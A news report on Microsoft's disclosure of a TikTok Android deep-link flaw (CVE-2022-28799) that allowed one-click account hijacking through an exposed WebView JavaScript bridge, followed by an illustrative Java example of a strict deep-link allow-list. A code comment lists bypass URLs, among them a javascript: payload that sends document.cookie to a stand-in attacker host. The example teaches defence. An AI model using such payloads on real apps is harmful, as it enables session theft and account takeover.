Microsoft discovers a vulnerability in TikTok that allowed one-click account hijacking.

PARIS, Sept. 2 (Benin News / EP) –

Microsoft has discovered in TikTok a bug which could have allowed cybercriminals to take over a user's account with a single click on a malicious link.

The Redmond company explained on its blog that it had reported the flaw to TikTok in February and that the platform "responded quickly" by releasing a patch to address the reported vulnerability.

It also pointed out that it was not aware of anyone having exploited this vulnerability in the wild to carry out attacks against TikTok users.

First, the tech company recalled that TikTok ships two versions of its Android app, one for East and Southeast Asia and one for all other countries. When it ran its vulnerability assessment, it found that the issue affected both versions.

Specifically, this bug, tracked as CVE-2022-28799, allowed attackers to bypass the app's deep link verification.

Thanks to this, cybercriminals could force the app to load an arbitrary URL into its WebView component, which is meant to display only the app's own internal web pages.

Microsoft pointed out that because this WebView exposes native functionality to the loaded page through JavaScript bridges, an attacker's page would have had access to more than 70 exposed methods, and through them to the potential victim's information.

The flaw even allowed them to retrieve the user's authentication tokens, by triggering a request to an attacker-controlled server and logging the cookies and request headers that accompanied it.

To determine the severity of the vulnerability, Microsoft researchers demonstrated the attack by sending a malicious link to a test device. Once the URL was clicked, the tokens that TikTok's servers use to verify a user's identity and grant access to their profile were sent to the attacker's server.

The group pointed out that an attacker could have used this vulnerability to hijack an account without the user's knowledge, simply by getting them to click on one of these malicious links.
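The following Android example is added here to illustrate the class of flaw described above; it is not TikTok's code nor Microsoft's proof of concept, and the scheme, hosts, query parameter and bridge method are all hypothetical. It shows a deep-link handler that lets a URL parameter decide what the WebView loads, first with the kind of loose substring check that invites bypasses, then with a strict scheme and host allow-list, and it keeps the JavaScript bridge reachable only from pages that passed that check.

```java
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebResourceRequest;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/**
 * Hypothetical deep link handled by this Activity: example://open?url=<target>
 * The host names, scheme and parameter name are illustrative only.
 */
public class DeepLinkWebViewActivity extends Activity {

    // Exact first-party hosts the WebView is allowed to load (hypothetical).
    private static final Set<String> ALLOWED_HOSTS = new HashSet<>(
            Arrays.asList("m.example.com", "www.example.com"));

    /**
     * Weak check of the kind that leads to deep-link bypasses. It accepts, for example:
     *   https://evil.example/?u=m.example.com      (match in the query string)
     *   https://m.example.com.evil.example/        (match in a subdomain of the attacker)
     *   https://m.example.com@evil.example/        (match in the userinfo part)
     *   javascript:fetch('https://evil.example/?c='+document.cookie)//m.example.com
     */
    static boolean weakCheck(String url) {
        return url != null && url.contains("example.com");
    }

    /** Strict check: parse, require https, reject userinfo, compare the host exactly. */
    static boolean isAllowedTarget(String url) {
        if (url == null) return false;
        Uri uri = Uri.parse(url);
        if (!uri.isHierarchical()) return false;            // javascript:, data:, about: are opaque
        String scheme = uri.getScheme();
        if (scheme == null || !scheme.equalsIgnoreCase("https")) return false;
        if (uri.getUserInfo() != null) return false;         // https://m.example.com@evil.example
        String host = uri.getHost();
        return host != null && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    private WebView webView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        webView = new WebView(this);
        setContentView(webView);

        // Deep-link data arrives from an arbitrary sender and must be treated as untrusted.
        Uri deepLink = getIntent().getData();
        String target = deepLink == null ? null : deepLink.getQueryParameter("url");

        if (!isAllowedTarget(target)) {
            // Never load the rejected value; fall back to a fixed first-party page.
            target = "https://www.example.com/";
        }

        // Re-check every navigation the WebView performs (redirects, links, frames), using
        // the URL as the WebView itself resolved it rather than the raw deep-link string.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                // Returning true cancels the navigation.
                return !isAllowedTarget(request.getUrl().toString());
            }
        });

        webView.getSettings().setJavaScriptEnabled(true);
        // The bridge is what an attacker's page would abuse; it is attached only because
        // every URL this WebView can reach has passed isAllowedTarget().
        webView.addJavascriptInterface(new NativeBridge(), "NativeBridge");
        webView.loadUrl(target);
    }

    /** Stand-in for the many native methods a real app exposes to its own web content. */
    static class NativeBridge {
        @JavascriptInterface
        public String getAppVersion() {
            return "1.0";
        }
    }
}
```

Once an attacker-controlled page is loaded into such a WebView, its JavaScript can call `window.NativeBridge.getAppVersion()` and every other annotated method, which is why the size of the bridge surface (more than 70 methods in the case described above) matters as much as the deep-link check itself. Two caveats for anyone applying this pattern: Android's Uri parser and the WebView's own URL parser do not always agree on malformed input, so the check in shouldOverrideUrlLoading, which sees the URL the WebView actually resolved, is a necessary second layer rather than a redundancy; and addJavascriptInterface injects the bridge into every frame, so third-party iframes must also be kept out by the same allow-list.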
